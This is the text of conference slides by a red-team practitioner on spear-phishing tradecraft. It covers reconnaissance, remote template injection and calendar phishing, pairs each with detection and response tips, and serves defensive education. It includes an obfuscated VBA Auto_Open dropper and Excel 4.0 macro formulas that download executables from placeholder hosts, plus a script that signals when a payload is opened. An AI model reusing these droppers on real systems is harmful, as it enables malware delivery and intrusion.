2. Warning! Challenger approaching
Jesse Nebling (@bashexplode)
● Internal Red Team
● Former Consultant
● Seattle, WA
● Windows exploitation
● “Purple Team” advocate
● Music production
● Stoked to be here
A new foe has appeared!
3. During a Red Team operation, treat
the attacker as a real Adversary.
4. What’s the point?
● Spear Phishing trial and error by both Adversaries and Blue Teams
● Pinpoint areas that may help tighten security and foster detection
● Give Blue Teams a glimpse of how Adversaries are plotting against them
6. Recon: Network & (Security) Tech Stack
Typical OSINT Activities:
● whois
● Subdomain lookups
● Job openings for specific technologies
● Current employee job descriptions
● Social Media
● File metadata
● Public code repositories (e.g. github)
● Sites that share tech stacks (e.g. stackshare.io)
● Finding services that expose internal domain
names
● Bouncing emails off of domains
What the adversaries use this for:
● Create firewall rules to C2 servers
● Discover single factor authentication entry
points
● Environmental keying
● Crafting malicious payloads
● Tailoring tradecraft
Relevant Threat Actor: All Tool reference: https://github.com/bashexplode/pacifist-toolkit
7. MS Lync/Skype for Business services give base64
encoded internal NetBIOS domain name and FQDN
when invalid credentials are entered:
Bounced email uncovering internal host and
domain name as well as email sandbox service:
Recon: Network & (Security) Tech Stack
Relevant Threat Actor: All Talk reference: The Weakest Lync (DerbyCon 2016)
8. Recon: Network & (Security) Tech Stack
Areas of potential detection:
● Mass downloads of externally hosted files
● Emails being bounced against
non-existent email accounts
● Bruteforcing single factor authentication
pages
Additional time cost to attacker:
● Egress points outside of networks registered
under company’s name
● External covered fully by multifactor
authentication
● Employees only have general job descriptions
● Job descriptions do not have specific
technologies
● Metadata is wiped from all externally hosted
files
● Tech stack is not publically shared
● Wildcard emails not allowed/Cannot bounce
emails
Relevant Threat Actor: All Tool reference: https://github.com/bashexplode/pacifist-toolkit
9. Adversarial OpSec: Testing Dropper Malware
Relevant Threat Actor: All
Assume Adversary is extremely dedicated.
Take all information uncovered from
reconnaissance and set up environment that
mimics target’s tech stack.
● Discover methods to bypass AV and EDR
tools
● Learn what techniques can be used to
move laterally and escalate privileges
without triggering alerts in the tech stack
10. Adversarial OpSec: Image Injection & Text Messaging
To understand if document was opened and
alert on potential blue team activity.
● Set up payload to reach out to a benign
image hosted on the web server
○ Microsoft Word -> Insert Quick Parts ->
Field -> IncludePicture -> Data not stored
with document
● Any time the image is requested, send a
text message for instant notification the
payload has been open
● UNC path injection can also be used to
obtain NTLMv2 hash and obtain alert
Sample Python text message script:
User Agent for Image GET Requests (Win 10):
● MS Word Office 365 Version 16.0.12026
● MS Word Version 14.0.4760.1000.20344
Relevant Threat Actor: All
import smtplib
server = smtplib.SMTP( "smtp.gmail.com", 587 )
server.starttls()
server.login( '<gmail_address>', '<gmail_password>' )
server.sendmail( '<from>', '<number>@vtext.com', 'PWND' )
Mozilla/4.0 (compatible; ms-office; MSOffice 16)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64;
x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET
CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729;
InfoPath.3; ms-office; MSOffice 14)
SMS email reference: https://bit.ly/32XiN4l
11. Adversarial OpSec: One-Time Use Tokens
Used in combination with network firewall rules to
help further tighten access control on malicious
payloads.
● Set staging server with a database that tracks
token usage
● Set up payload to reach out to a web page with
a token
● If first (or second) time the token is used
redirect to real payload
● Otherwise, redirect to benign page or benign
payload
● Set up htaccess to redirect atypical user agents
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
Tool reference: https://github.com/bashexplode/otu-plz
12. Adversarial OpSec
Areas of potential detection:
● Office/PDF reader processes with
outbound network connectivity (HTTP(S),
SMB, DNS)
● Malicious links in emails from non-trusted
domains
● Previously mentioned GET requests with
Office User Agent strings
● For the extremely curious, mass phishing
campaigns with similar links and one-time
use tokens can be used to track down an
unclicked link to analyze a payload
Incident Response and Defense tips:
● Stray from attempting to download payloads
for analysis directly from malicious servers,
htaccess redirection may be in place
● Assume adversary knows how to get around
EDR tools and AV; after tuning these for lesser
skilled adversaries focus on other anomalous
activity such as low-level users using
administrative command line utilities, lateral
movement from HR department workstations,
etc.
● Disable SMB outbound traffic
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
13. Malicious Attachments Overview
Many email sandboxing/filtering solutions have
cracked down on well-known payloads, and deny
being sent to the recipient altogether.
Dedicated adversaries will discover ways
around these protections...
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0, Tropic Trooper
MITRE ATT&CK ID: T1221
14. Malicious Attachments: Remote Template Injection
Pre-staging technique to abstain from sending true
payload and risk discovery of C2 infrastructure
● Create a document template that has a
malicious macro in it
● Set up a burner staging server and host
Word document template on a site that looks
legitimate
● Create a benign document and edit XML file
stored in Word document archive to point at
the template file hosted
○ Document.docxword_relssettings.xml.rels
● Allows docx files to run macros and nothing
malicious in document sent to user!
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0...
MITRE ATT&CK ID: T1221
Remote Template Web Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026
● MS Word Version 14.0.4760.1000.20344
OPTIONS /payload-dir/ “Microsoft Office Word 2014”
OPTIONS /payload-dir/ “Microsoft Office Word 2014”
HEAD /payload-dir/Template.dotm "Microsoft Office Word 2014"
OPTIONS /payload-dir/ “Microsoft Office Word 2014”
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; ms-office;
MSOffice 16)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
OPTIONS /payload-dir/ “Microsoft Office Protocol Discovery”
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
X2 OPTIONS /payload-dir/Template.dotm
"Microsoft-WebDAV-MiniRedir/10.0.17134"
x4 PROPFIND /payload-dir/ “Microsoft-WebDAV-MiniRedir/10.0.17134”
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC
2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729;
InfoPath.3; ms-office; MSOffice 14)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
x2 PROPFIND / “Microsoft-WebDAV-MiniRedir/10.0.17134”
15. Malicious Attachments: VBA Macros
Classic Initial Access technique that has gone
through many iterations
● WMI execution
● PowerShell download cradles
● Hiding variables in document properties
● Hiding variables in document XML
● Hiding variables in images/alternative text
● Reverse strings and replace characters
● Use words relevant to business as
variables
● Stage the payload
● Execute outside of Office ancestry
Relevant Threat Actors: APT12, APT19, APT28, FIN4...
MITRE ATT&CK IDs: T1193, T1064
References: VBA Stomping - Advanced Malware Techniques (DerbyCon 2018)
Sub Auto_Open(): downloadFile : XSL : PrivacyMode : End Sub
Function PrivacyMode()
ActiveSheet.Shapes(1).Visible = msoFalse
End Function
Function downloadFile()
' Replacement characters
accounting = "#$"
' stage URL https://example.com/payload.jpg
finance = "gp#$j.d#$aoly#$ap/m#$oc.e#$lpmax#$e//#$sp#$tth"
' where to save the downloaded file to - C:Users<user>Desktoptext.exe
path = Environ("userprofile") & Application.PathSeparator & _
StrReverse(Replace(ex#$e.ts#$etpo#$tks#$eD, accounting, "")
' MSXML2.ServerXMLHTTP object
Set Tuesday = CreateObject(StrReverse(Replace(PTTHLMXre#$vreS.2LMXSM, accounting, "")
' Creating and sending GET request for payload
Tuesday.Open "GET", finance, False
Tuesday.send
If Tuesday.Status = 200 Then
' ADODB.Stream object
Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "")
January.Open
January.Type = 1
January.Write Tuesday.ResponseBody
January.Position = 0
January.SaveToFile path
January.Close
End Function
' Execution via XSL
Function XSL()
…SNIP…
End Sub
16. Sample Excel 4.0 Macro:
● Insert... -> MS Excel 4.0 Macro
● Set Define Name for Cell A1 to “Auto_Open”
User Agent for GET Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026
●
● MS Word Version 14.0.4760.1000.20344
Malicious Attachments: Excel 4.0/VBA Hybrid
Relevant Threat Actor: TA505
Use old version of Excel macros to execute code
that bypasses current detection tools
● Stan Hegt and team showed how to execute
shellcode directly through Windows APIs
and Excel 4.0 macro at DerbyCon
● I wanted to get away from two things with
this method
○ Spawning as a child process of Excel
○ Giving away C2 infrastructure if doc is
discovered
● Came up with my own attack flow with an
Excel 4.0 downloader and VBA execution
References: The MS Office Magic Show (DerbyCon 2018)
=REGISTER("Urlmon","URLDownloadToFileA","JJCCJJ","URLD",,1,9)
=URLD(,"https://example.com/logo.jpg","C:tempartifact.exe",0,)
=WAIT(NOW() + "00:00:05")
‘VBA Execution Function
=Taxes()
=HALT()
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64;
Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR
3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; wbx 1.0.0; Zoom 3.6.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64;
Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727;
.NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
17. Malicious Attachments
Points of discovery:
● Documents with outbound network connectivity
● VBA Scripts run from documents
● Execution as child process of Office product
● Old format versions of Office documents (<Office 2003)
● Calls to misused objects and functions in Office VBA macros:
Incident Response tip:
● Sandbox payloads on a system representative of your domain without outbound connectivity
(Environmental keying bypasses this)
● oledump.py to scrape VBA and Excel 4.0 (plugin_biff.py) macro content and view code
Relevant Threat Actor: TA505 Tool reference: https://github.com/DidierStevens/DidierStevensSuite
○ C08AFD90-F2A1-11D1-8455-00A0C91F3880
○ Microsoft.XMLDOM
○ Schedule.Service
○ ADODB.Stream
○ MSXML2.ServerXMLHTTP
○ ActiveSheet.Shapes(#).Visible = msoFalse
○ StrReverse
○ Replace
18. Malicious Attachments: Calendar Phishing
Make a meeting invite notification pop up posing
as important meeting with link of presentation
material or conference software to view meeting
● Create a calendar event and include victim
as attendee
● Attach a malicious link or document to invite
● Opt out of sending an invite email
● Shells?
Points of discovery:
● Meetings originating from non-trusted
domain email addresses
● Meetings that appear without an emailed
meeting invite
Incident Response tip:
● Get business to disable automatic adding
of invitations to calendar
Relevant Threat Actor: Scammers, me, Future Threat Actors probably
19. Thank you for playing!
Thanks your time and attention.
Questions?